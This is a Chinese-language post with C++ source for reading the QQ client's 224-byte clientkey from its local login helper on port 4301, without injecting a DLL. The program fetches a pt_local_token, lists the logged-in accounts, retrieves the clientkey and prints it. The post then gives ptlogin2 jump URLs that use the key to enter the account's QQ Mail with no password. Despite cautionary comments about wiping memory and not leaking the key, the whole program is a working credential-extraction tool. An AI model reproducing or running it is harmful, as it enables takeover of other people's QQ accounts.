讀取ClientKey的另一種思路,無需注入DLL

需要注意的是,這種方法獲取的clientkey長度是224字節(224個字符),和之前注入DLL獲取的不一樣,兩者使用的跳轉參數也不同(見下文)。

注入DLL獲取的是64字節的clientkey。

利用方法:

64字節: http://ptlogin2.qq.com/jump?ptlang=2052&clientuin=QQ號碼&clientkey=64個字節的KEY&u1=需要登陸的QQ服務網站地址

224字節: http://ptlogin2.qq.com/jump?clientuin=QQ號&clientkey=224字節的KEY&keyindex=9&u1=需要登陸的QQ服務網站地址

 

例如,我想利用224字節的key,無密進入qq郵箱

用瀏覽器訪問下面構造的地址,成功後會返回一個地址,複製再訪問,就直接進入QQ郵箱了。注意:這說明clientkey本身就是完整的登錄憑證——任何能連上本機4301端口、並拿到pt_local_token的進程都能取得它,切勿將其寫入日誌或外泄。

http://ptlogin2.qq.com/jump?clientuin=QQ號&clientkey=224字節key&keyindex=9&u1=https%3A%2F%2Fmail.qq.com%2Fcgi-bin%2Flogin%3Fvt%3Dpassport%26vm%3Dwpt%26ft%3Dloginpage%26target%3D&pt_local_tk=&pt_3rd_aid=0&ptopt=1&style=25

#include "stdafx.h"
#include <windows.h>
#include <WinInet.h>
#include <cstring>
#include <iostream>
#include <string>
#pragma comment(lib,"wininet.lib")
using namespace std;
 
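char URL_STRING[] = "https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=636014201&s_url=http://www.qq.com/qq2012/loginSuccess.htm&style=20&border_radius=1&target=self&maskOpacity=40";

// The QQ client's local login helper, reached over TLS on a high port. Only the
// host name is visible here; presumably it resolves to loopback - confirm.
static const char LOCAL_HOST[] = "localhost.ptlogin2.qq.com";
static const INTERNET_PORT LOCAL_PORT = 4301;

// Referer the helper expects. Any local process can send it (this program does),
// so it is a browser-side nudge rather than an access control.
static const char LOCAL_REFERER[] =
    "Referer:https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=636014201&s_url=http%3A%2F%2Fwww.qq.com%2Fqq2012%2FloginSuccess.htm";

// Overwrites a string's bytes before it is released: pt_local_token and
// clientkey are bearer credentials and should not linger in freed heap memory.
static void wipe(std::string& secret)
{
    if (!secret.empty()) {
        SecureZeroMemory(&secret[0], secret.size());
    }
    secret.clear();
}

// Finds `key` inside [buf, buf+len) and returns the text after it up to (not
// including) the first character listed in `stop`; empty string when absent.
//
// buf may contain embedded NULs (WinInet returns raw headers as NUL-separated
// lines, double-NUL terminated) and must be NUL-terminated at buf[len]; the
// scan walks every NUL-delimited segment. With takeLast the last occurrence in
// the buffer wins, which is what the original backward strstr() scan selected.
static std::string find_value(const char* buf, DWORD len, const char* key,
                              const char* stop, bool takeLast)
{
    const size_t keyLen = strlen(key);
    const char* found = NULL;
    for (const char* seg = buf; seg < buf + len; seg += strlen(seg) + 1) {
        for (const char* hit = strstr(seg, key); hit != NULL; hit = strstr(hit + keyLen, key)) {
            found = hit + keyLen;
            if (!takeLast) {
                return std::string(found, strcspn(found, stop));
            }
        }
    }
    if (found == NULL) {
        return std::string();
    }
    // strcspn stops at the terminating NUL too, so a value without a `stop`
    // character no longer dereferences a NULL strstr() result.
    return std::string(found, strcspn(found, stop));
}

// Reports the HTTP status of a sent request. Non-200 is logged but not fatal:
// the original flow never checked it and the cookies may be set regardless.
static void report_status(HINTERNET req, const char* what)
{
    DWORD status = 0;
    DWORD size = sizeof status;
    if (HttpQueryInfoA(req, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &status, &size, NULL)) {
        cout << "[*] " << what << " -> HTTP " << status << endl;
    }
}

// Opens a TLS session to host:port and sends GET `path` with optional extra
// request headers (one "Name:value" line, or NULL for none). On success
// returns the request handle and stores the session in *session; the caller
// closes both, request first. On failure everything opened here is closed,
// *session is NULL, and NULL is returned after a diagnostic on stderr.
static HINTERNET send_get(HINTERNET hInternet, const char* host, INTERNET_PORT port,
                          const char* path, const char* headers, HINTERNET* session)
{
    *session = InternetConnectA(hInternet, host, port, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
    if (*session == NULL) {
        cerr << "[-] InternetConnectA(" << host << ") failed: " << GetLastError() << endl;
        return NULL;
    }
    // Empty built-in referrer; the Referer the local helper wants comes via `headers`.
    HINTERNET req = HttpOpenRequestA(*session, "GET", path, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
    const DWORD headerLen = headers != NULL ? (DWORD)strlen(headers) : 0;
    if (req == NULL || !HttpSendRequestA(req, headers, headerLen, NULL, 0)) {
        cerr << "[-] GET to " << host << " failed: " << GetLastError() << endl;
        if (req != NULL) {
            InternetCloseHandle(req);
        }
        InternetCloseHandle(*session);
        *session = NULL;
        return NULL;
    }
    report_status(req, host);
    return req;
}

// GETs host:port/path and returns the value following `key` in the last
// raw response header that carries it, cut at the next ';' (cookie syntax).
// Returns an empty string if the request or the lookup fails.
static std::string fetch_header_value(HINTERNET hInternet, const char* host, INTERNET_PORT port,
                                      const char* path, const char* headers, const char* key)
{
    HINTERNET session = NULL;
    HINTERNET req = send_get(hInternet, host, port, path, headers, &session);
    if (req == NULL) {
        return std::string();
    }
    // 8 KiB rather than the original 1 KiB: a 224-char clientkey plus the other
    // Set-Cookie lines can exceed 1 KiB. When the buffer was too small the old
    // code ignored the failure and used the "required size" HttpQueryInfo left
    // in dwSize as an offset past the end of the buffer.
    // HttpQueryInfoA (not the TCHAR macro) is used on purpose: in a Unicode
    // build the macro writes UTF-16 into this char buffer and strstr never matches.
    char raw[8192];
    DWORD rawLen = sizeof raw;
    std::string value;
    if (HttpQueryInfoA(req, HTTP_QUERY_RAW_HEADERS, raw, &rawLen, NULL)) {
        value = find_value(raw, rawLen, key, ";", true);
    } else {
        cerr << "[-] HttpQueryInfoA(RAW_HEADERS) failed: " << GetLastError() << endl;
    }
    SecureZeroMemory(raw, sizeof raw);   // the raw headers carry the credential
    InternetCloseHandle(req);
    InternetCloseHandle(session);
    return value;
}

// GETs host:port/path and returns the entire response body, looping
// InternetReadFile until it reports zero bytes (a single
// InternetQueryDataAvailable only describes the first chunk in flight).
// Returns an empty string if the request fails.
static std::string fetch_body(HINTERNET hInternet, const char* host, INTERNET_PORT port,
                              const char* path, const char* headers)
{
    HINTERNET session = NULL;
    HINTERNET req = send_get(hInternet, host, port, path, headers, &session);
    if (req == NULL) {
        return std::string();
    }
    std::string body;
    char chunk[4096];
    DWORD got = 0;
    while (InternetReadFile(req, chunk, sizeof chunk, &got) && got != 0) {
        body.append(chunk, got);
    }
    InternetCloseHandle(req);
    InternetCloseHandle(session);
    return body;
}

// Entry point. Replays what the QQ login page does in a browser, but from a
// plain process: (1) fetch pt_local_token from xui.ptlogin2.qq.com, (2) ask the
// client's local helper which accounts are logged in, (3) trade the token and
// account for the 224-char clientkey. Prints the uin and the clientkey to
// stdout; returns 0 on success, 1 on any failure. argc/argv are unused.
int _tmain(int argc, _TCHAR* argv[])
{
    (void)argc;
    (void)argv;

    // Split URL_STRING into host and path for InternetConnectA/HttpOpenRequestA.
    URL_COMPONENTSA parts = { 0 };
    char host[128] = { 0 };
    char path[256] = { 0 };
    parts.dwStructSize = sizeof parts;
    parts.lpszHostName = host;
    parts.dwHostNameLength = ARRAYSIZE(host);
    parts.lpszUrlPath = path;
    parts.dwUrlPathLength = ARRAYSIZE(path);
    if (!InternetCrackUrlA(URL_STRING, (DWORD)strlen(URL_STRING), 0, &parts)) {
        cerr << "[-] InternetCrackUrlA failed: " << GetLastError() << endl;
        return 1;
    }

    HINTERNET hInternet = InternetOpenA("Microsoft Internet Explorer", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
    if (hInternet == NULL) {
        cerr << "[-] InternetOpenA failed: " << GetLastError() << endl;
        return 1;
    }

    int rc = 1;
    std::string token;
    std::string clientkey;

    // Step 1: the xlogin page sets pt_local_token in a cookie; the local helper
    // demands it on every call.
    token = fetch_header_value(hInternet, host, INTERNET_DEFAULT_HTTPS_PORT, path, NULL, "pt_local_token=");
    if (token.empty()) {
        cerr << "[-] pt_local_token not found in response headers" << endl;
    } else {
        // Step 2: list logged-in accounts. The body is a JS callback wrapping a
        // JSON array; the first "account" is used, as the original comment
        // intended (its backward scan actually picked the last one).
        std::string uinsPath = "/pt_get_uins?callback=ptui_getuins_CB&pt_local_tk=" + token;
        std::string body = fetch_body(hInternet, LOCAL_HOST, LOCAL_PORT, uinsPath.c_str(), LOCAL_REFERER);
        std::string uin = find_value(body.c_str(), (DWORD)body.size(), "\"account\":\"", "\"", false);

        // The uin is spliced into a URL next, so accept digits only; anything
        // else (or nothing) means the helper answered unexpectedly.
        if (uin.empty() || uin.find_first_not_of("0123456789") != std::string::npos) {
            cerr << "[-] no usable account in pt_get_uins response" << endl;
        } else {
            cout << "[+] uin:" << uin << endl;

            // Step 3: the helper returns the clientkey in a Set-Cookie header.
            // std::string concatenation replaces the unbounded strcat() into a
            // MAX_PATH buffer, which overflowed on a long token or uin.
            std::string stPath = "/pt_get_st?clientuin=" + uin + "&callback=ptui_getst_CB&pt_local_tk=" + token;
            clientkey = fetch_header_value(hInternet, LOCAL_HOST, LOCAL_PORT, stPath.c_str(), LOCAL_REFERER, "clientkey=");
            if (clientkey.empty()) {
                cerr << "[-] clientkey not found in pt_get_st response headers" << endl;
            } else {
                // This value alone logs the account into QQ web services; treat
                // stdout as sensitive.
                cout << "[+] client key:" << clientkey << endl;
                rc = 0;
            }
        }
    }

    wipe(clientkey);
    wipe(token);
    InternetCloseHandle(hInternet);
    return rc;
}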

 
